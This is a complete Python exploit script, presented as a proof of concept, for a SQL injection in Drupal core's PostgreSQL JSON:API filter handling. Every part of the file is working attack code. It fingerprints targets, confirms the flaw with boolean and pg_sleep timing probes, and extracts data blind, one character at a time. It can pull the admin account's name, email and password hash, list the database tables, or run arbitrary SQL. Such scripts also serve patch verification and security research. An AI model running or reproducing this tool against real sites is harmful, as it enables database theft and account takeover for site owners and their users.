#!/usr/bin/env python3 """ CVE-2026-9082 - Drupal Core PostgreSQL SQL Injection PoC This script exploits a SQL injection vulnerability in Drupal's PostgreSQL Entity Query Condition handler (core/modules/pgsql/src/EntityQuery/Condition.php). The translateCondition() method uses user-controlled array keys from JSON:API filter values to construct SQL placeholder names without sanitization. PDO only parses alphanumeric+underscore characters as placeholder names, so any suffix after the first ')' becomes literal SQL in the query. IMPORTANT: PDO emulated prepares (enabled by default in Drupal/PostgreSQL) respects -- SQL comments during placeholder tokenization. The injection must therefore avoid -- and instead balance parentheses explicitly so that all :placeholder tokens remain visible to PDO. Affects: Drupal 8.0 - 11.3.9 with PostgreSQL backend Fixed in: 11.3.10, 11.2.12, 10.6.9, 10.5.10 Advisory: SA-CORE-2026-004 CVE: CVE-2026-9082 Dependencies: pip install requests rich Usage: python3 CVE-2026-9082.py -u https://target.com --check python3 CVE-2026-9082.py -u https://target.com --version python3 CVE-2026-9082.py -u https://target.com --admin python3 CVE-2026-9082.py -u https://target.com --query "SELECT current_user" Author: 7h30th3r0n3 License: For authorized security testing and educational purposes only. """ import argparse import sys import time from urllib.parse import quote import requests import requests.packages.urllib3 from rich.console import Console from rich.table import Table from rich.prompt import Prompt requests.packages.urllib3.disable_warnings() console = Console() DEFAULT_TIMEOUT = 30 DEFAULT_SLEEP = 5 SLEEP_THRESHOLD = 3 CANARY_A = "CVE20269082a" CANARY_B = "CVE20269082b" CANARY_C = "CVE20269082c" # ------------------- URL HELPERS ------------------- def _build_qs(field, injection_key): """Build a properly encoded query string for the JSON:API filter. The injection key must be URL-encoded inside the bracket delimiters so that PHP's $_GET parser receives the raw key intact as an array key. Brackets for the outer filter structure use %5B / %5D. """ ek = quote(injection_key, safe="") return ( f"filter%5Bsqli%5D%5Bcondition%5D%5Bpath%5D={quote(field, safe='')}" f"&filter%5Bsqli%5D%5Bcondition%5D%5Boperator%5D=IN" f"&filter%5Bsqli%5D%5Bcondition%5D%5Bvalue%5D%5B0%5D={CANARY_A}" f"&filter%5Bsqli%5D%5Bcondition%5D%5Bvalue%5D%5B1%5D={CANARY_B}" f"&filter%5Bsqli%5D%5Bcondition%5D%5Bvalue%5D%5B{ek}%5D={CANARY_C}" ) # ------------------- RECONNAISSANCE ------------------- def check_drupal(base_url, session, timeout): """Verify that the target runs Drupal with JSON:API enabled.""" console.print("\n[bold cyan]🔍 Checking target for Drupal + JSON:API...[/bold cyan]") try: resp = session.get(f"{base_url}/jsonapi", timeout=timeout) if resp.status_code == 200 and "jsonapi" in resp.text: console.print("[green]✔ JSON:API endpoint found and active[/green]") return True except requests.RequestException: pass try: resp = session.get(base_url, timeout=timeout) generator = resp.headers.get("X-Generator", "").lower() if "drupal" in generator or "drupal" in resp.text.lower(): console.print("[green]✔ Drupal detected[/green]") console.print("[yellow]⚠ JSON:API endpoint not responding — may be disabled[/yellow]") return True except requests.RequestException as exc: console.print(f"[red]❌ Connection error: {exc}[/red]") return False console.print("[red]❌ Could not confirm Drupal installation[/red]") return False def discover_resource_types(base_url, session, timeout): """Discover JSON:API resource types with a title field.""" console.print("[bold cyan]📡 Discovering JSON:API resource types...[/bold cyan]") try: resp = session.get(f"{base_url}/jsonapi", timeout=timeout) if resp.status_code == 200: data = resp.json() types = [ key.replace("--", "/") for key in data.get("links", {}) if key.startswith("node--") ] if types: console.print(f"[green]✔ Found node types: {', '.join(types)}[/green]") return types except (requests.RequestException, ValueError): pass candidates = ["node/article", "node/page", "node/basic_page"] found = [] for rt in candidates: try: resp = session.get(f"{base_url}/jsonapi/{rt}", timeout=timeout) if resp.status_code == 200: found.append(rt) console.print(f"[green]✔ Found resource type: {rt}[/green]") except requests.RequestException: continue return found # ------------------- INJECTION ENGINE ------------------- def send_injection(base_url, resource_type, field, injection_key, session, timeout): """Send a crafted JSON:API request with the injection payload. Uses pre-encoded query string and overrides the prepared URL to prevent the requests library from re-encoding brackets. """ raw_url = ( f"{base_url}/jsonapi/{resource_type}" f"?{_build_qs(field, injection_key)}" ) req = requests.Request("GET", raw_url, headers=session.headers) prepared = session.prepare_request(req) prepared.url = raw_url start = time.time() try: resp = session.send(prepared, timeout=timeout, verify=session.verify) except requests.Timeout: return None, time.time() - start except requests.RequestException: return None, 0.0 return resp, time.time() - start # ------------------- DETECTION ------------------- def detect_time_based(base_url, rt, session, timeout, sleep_time): """Time-based blind detection using pg_sleep() with CASE WHEN.""" console.print(f"[bold cyan]⏱️ Time-based probe (pg_sleep({sleep_time}))...[/bold cyan]") _, baseline = send_injection(base_url, rt, "title", "2", session, timeout) console.print(f" Baseline response: [yellow]{baseline:.2f}s[/yellow]") key = ( f"1))/**/OR/**/(SELECT/**/CASE/**/WHEN/**/current_user/**/IS/**/NOT/**/NULL" f"/**/THEN/**/pg_sleep({sleep_time})/**/ELSE/**/pg_sleep(0)" f"/**/END)::text=((chr(49)" ) _, injected = send_injection(base_url, rt, "title", key, session, timeout) console.print(f" Injected response: [yellow]{injected:.2f}s[/yellow]") delay = injected - baseline if delay >= SLEEP_THRESHOLD: console.print(f"\n[bold green]✔ VULNERABLE — time-based confirmed (+{delay:.1f}s delay)[/bold green]") console.print(f"[green] Resource type : {rt}[/green]") console.print(f"[green] Backend : PostgreSQL[/green]") return True return False def detect_boolean_based(base_url, rt, session, timeout): """Boolean-based detection: compare OR TRUE vs OR FALSE row counts.""" console.print("[bold cyan]🔀 Boolean-based probe (OR TRUE vs OR FALSE)...[/bold cyan]") resp_true, _ = send_injection( base_url, rt, "title", "1))/**/OR/**/TRUE/**/OR/**/1=1/**/OR/**/((1=1", session, timeout, ) resp_false, _ = send_injection( base_url, rt, "title", "1))/**/OR/**/FALSE/**/AND/**/1=2/**/OR/**/((1=2", session, timeout, ) if resp_true is None or resp_false is None: return False try: n_true = len(resp_true.json().get("data", [])) n_false = len(resp_false.json().get("data", [])) if n_true > n_false: console.print(f"\n[bold green]✔ VULNERABLE — boolean-based confirmed[/bold green]") console.print(f"[green] OR TRUE → {n_true} results[/green]") console.print(f"[green] OR FALSE → {n_false} results[/green]") console.print(f"[green] Resource type : {rt}[/green]") return True except (ValueError, AttributeError): pass return False def test_vulnerability(base_url, session, timeout, sleep_time): """Run detection probes and return (vulnerable: bool, resource_type: str).""" console.print("\n[bold]🚀 Testing for CVE-2026-9082...[/bold]") resource_types = discover_resource_types(base_url, session, timeout) if not resource_types: console.print("[red]❌ No JSON:API resource types found — cannot test[/red]") return False, None for rt in resource_types: console.print(f"\n[bold cyan]📌 Probing {rt}...[/bold cyan]") if detect_boolean_based(base_url, rt, session, timeout): return True, rt if detect_time_based(base_url, rt, session, timeout, sleep_time): return True, rt console.print("\n[red]❌ Target does not appear vulnerable[/red]") console.print("[dim] (may not use PostgreSQL, or JSON:API is restricted)[/dim]") return False, None # ------------------- DATA EXTRACTION ------------------- def extract_char_time(base_url, rt, sql, pos, session, timeout, sleep_time=2): """Extract one character via time-based binary search.""" lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 key = ( f"1))/**/OR/**/(SELECT/**/CASE/**/WHEN/**/" f"ASCII(SUBSTR(({sql}),{pos},1))>{mid}/**/" f"THEN/**/pg_sleep({sleep_time})/**/ELSE/**/pg_sleep(0)" f"/**/END)::text=((chr(49)" ) _, elapsed = send_injection(base_url, rt, "title", key, session, timeout) if elapsed >= sleep_time - 0.5: lo = mid + 1 else: hi = mid return chr(lo) if 32 <= lo <= 126 else None def extract_char_bool(base_url, rt, sql, pos, session, timeout): """Extract one character via boolean-based binary search.""" lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 key = ( f"1))/**/OR/**/(SELECT/**/ASCII(SUBSTR(" f"({sql}),{pos},1))>{mid})/**/AND/**/((1=1" ) resp, _ = send_injection(base_url, rt, "title", key, session, timeout) if resp is None: hi = mid continue try: n = len(resp.json().get("data", [])) if n > 0: lo = mid + 1 else: hi = mid except (ValueError, AttributeError): hi = mid return chr(lo) if 32 <= lo <= 126 else None def extract_string(base_url, rt, sql, session, timeout, method="time", max_len=200, sleep_time=2): """Extract a full string from the database character by character.""" result = "" trailing_spaces = 0 for pos in range(1, max_len + 1): if method == "time": ch = extract_char_time(base_url, rt, sql, pos, session, timeout, sleep_time) else: ch = extract_char_bool(base_url, rt, sql, pos, session, timeout) if ch is None or ch == "\x00": break result += ch if ch == " ": trailing_spaces += 1 if trailing_spaces >= 3: result = result.rstrip() break else: trailing_spaces = 0 console.print(f"\r[bold green]✔ Extracting:[/bold green] {result}", end="") console.print() return result # ------------------- HIGH-LEVEL COMMANDS ------------------- def cmd_version(base_url, rt, session, timeout, method, sleep_time): """Extract PostgreSQL version.""" console.print("\n[bold cyan]🐘 Extracting PostgreSQL version...[/bold cyan]") v = extract_string(base_url, rt, "SELECT/**/version()", session, timeout, method, sleep_time=sleep_time) console.print(f"\n[bold green]✔ PostgreSQL version:[/bold green] {v}") return v def cmd_dbinfo(base_url, rt, session, timeout, method, sleep_time): """Extract database user and name.""" console.print("\n[bold cyan]🗄️ Extracting database info...[/bold cyan]") user = extract_string(base_url, rt, "SELECT/**/current_user", session, timeout, method, sleep_time=sleep_time) console.print(f"[bold green]✔ Database user:[/bold green] {user}") db = extract_string(base_url, rt, "SELECT/**/current_database()", session, timeout, method, sleep_time=sleep_time) console.print(f"[bold green]✔ Database name:[/bold green] {db}") return user, db def cmd_admin(base_url, rt, session, timeout, method, sleep_time): """Extract Drupal admin (uid=1) credentials.""" console.print("\n[bold cyan]🔐 Extracting Drupal admin (uid=1) credentials...[/bold cyan]") name = extract_string( base_url, rt, "SELECT/**/name/**/FROM/**/users_field_data/**/WHERE/**/uid=1", session, timeout, method, sleep_time=sleep_time, ) mail = extract_string( base_url, rt, "SELECT/**/mail/**/FROM/**/users_field_data/**/WHERE/**/uid=1", session, timeout, method, sleep_time=sleep_time, ) passwd = extract_string( base_url, rt, "SELECT/**/pass/**/FROM/**/users_field_data/**/WHERE/**/uid=1", session, timeout, method, max_len=100, sleep_time=sleep_time, ) table = Table(title="Drupal Admin Credentials") table.add_column("Field", style="cyan") table.add_column("Value", style="green") table.add_row("Username", name) table.add_row("Email", mail) table.add_row("Password hash", passwd) console.print(table) return name, mail, passwd def cmd_tables(base_url, rt, session, timeout, method, sleep_time, limit=20): """List database tables.""" console.print(f"\n[bold cyan]📋 Extracting table names (limit {limit})...[/bold cyan]") sql = ( f"SELECT/**/string_agg(tablename,',')" f"/**/FROM/**/(SELECT/**/tablename/**/FROM/**/pg_tables" f"/**/WHERE/**/schemaname='public'" f"/**/ORDER/**/BY/**/tablename/**/LIMIT/**/{limit})/**/AS/**/t" ) raw = extract_string(base_url, rt, sql, session, timeout, method, max_len=2000, sleep_time=sleep_time) if raw: tables = [t.strip() for t in raw.split(",")] table = Table(title="Database Tables") table.add_column("#", style="dim") table.add_column("Table Name", style="green") for i, t in enumerate(tables, 1): table.add_row(str(i), t) console.print(table) return tables return [] def cmd_query(base_url, rt, sql_raw, session, timeout, method, sleep_time): """Execute a custom SQL extraction query.""" sql = sql_raw.replace(" ", "/**/") console.print(f"\n[bold cyan]💉 Extracting custom query...[/bold cyan]") result = extract_string(base_url, rt, sql, session, timeout, method, sleep_time=sleep_time) console.print(f"\n[bold green]✔ Result:[/bold green] {result}") return result # ------------------- MAIN ------------------- def main(): parser = argparse.ArgumentParser( description="CVE-2026-9082 — Drupal PostgreSQL SQL Injection PoC", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=( "examples:\n" " %(prog)s -u https://target.com --check\n" " %(prog)s -u https://target.com --version\n" " %(prog)s -u https://target.com --admin\n" ' %(prog)s -u https://target.com --query "SELECT current_user"\n' ), ) parser.add_argument("-u", "--url", help="Target Drupal base URL") parser.add_argument("--check", action="store_true", help="Only check if target is vulnerable") parser.add_argument("--version", action="store_true", help="Extract PostgreSQL version") parser.add_argument("--dbinfo", action="store_true", help="Extract database user and name") parser.add_argument("--admin", action="store_true", help="Extract Drupal admin (uid=1) credentials") parser.add_argument("--tables", action="store_true", help="List database tables") parser.add_argument("--query", help="Custom SQL query to extract") parser.add_argument("-m", "--method", choices=["time", "bool"], default="bool", help="Extraction method (default: bool)") parser.add_argument("-d", "--delay", type=int, default=DEFAULT_SLEEP, help=f"Seconds for pg_sleep probe (default: {DEFAULT_SLEEP})") parser.add_argument("--timeout", type=int, default=DEFAULT_TIMEOUT, help=f"HTTP request timeout (default: {DEFAULT_TIMEOUT})") parser.add_argument("--no-ssl-verify", action="store_true", help="Skip TLS certificate verification") args = parser.parse_args() console.print( "\n[bold white on blue] CVE-2026-9082 — Drupal PostgreSQL SQL Injection PoC [/bold white on blue]" ) console.print("[dim] Affected: Drupal 8.0 – 11.3.9 | Vector: JSON:API filter array key injection[/dim]\n") if not args.url: console.print("[bold yellow]No URL provided — entering interactive mode[/bold yellow]\n") url = Prompt.ask("🔗 Target Drupal URL") sleep_time = int(Prompt.ask("⏱️ pg_sleep seconds for detection", default="5")) timeout = int(Prompt.ask("🛑 HTTP timeout", default="30")) method = Prompt.ask("📡 Extraction method", choices=["time", "bool"], default="bool") action = Prompt.ask( "🎯 Action", choices=["check", "version", "dbinfo", "admin", "tables", "query"], default="check", ) custom_query = None if action == "query": custom_query = Prompt.ask("💉 SQL query to extract") else: url = args.url sleep_time = args.delay timeout = args.timeout method = args.method action = None custom_query = args.query url = url.rstrip("/") verify_ssl = not args.no_ssl_verify if args.url else True session = requests.Session() session.verify = verify_ssl session.headers.update({ "User-Agent": ( "Mozilla/5.0 (Windows NT 10.0; Win64; x64) " "AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/125.0.0.0 Safari/537.36" ), "Accept": "application/vnd.api+json", }) try: if not check_drupal(url, session, timeout): sys.exit(1) vulnerable, rt = test_vulnerability(url, session, timeout, sleep_time) if not vulnerable: sys.exit(1) if action: if action == "check": pass elif action == "version": cmd_version(url, rt, session, timeout, method, sleep_time) elif action == "dbinfo": cmd_dbinfo(url, rt, session, timeout, method, sleep_time) elif action == "admin": cmd_admin(url, rt, session, timeout, method, sleep_time) elif action == "tables": cmd_tables(url, rt, session, timeout, method, sleep_time) elif action == "query" and custom_query: cmd_query(url, rt, custom_query, session, timeout, method, sleep_time) else: if args.check: pass if args.version: cmd_version(url, rt, session, timeout, method, sleep_time) if args.dbinfo: cmd_dbinfo(url, rt, session, timeout, method, sleep_time) if args.admin: cmd_admin(url, rt, session, timeout, method, sleep_time) if args.tables: cmd_tables(url, rt, session, timeout, method, sleep_time) if args.query: cmd_query(url, rt, args.query, session, timeout, method, sleep_time) console.print("\n[bold green]✔ Done.[/bold green]") except KeyboardInterrupt: console.print("\n[yellow]⚠ Interrupted by user[/yellow]") sys.exit(130) if __name__ == "__main__": main()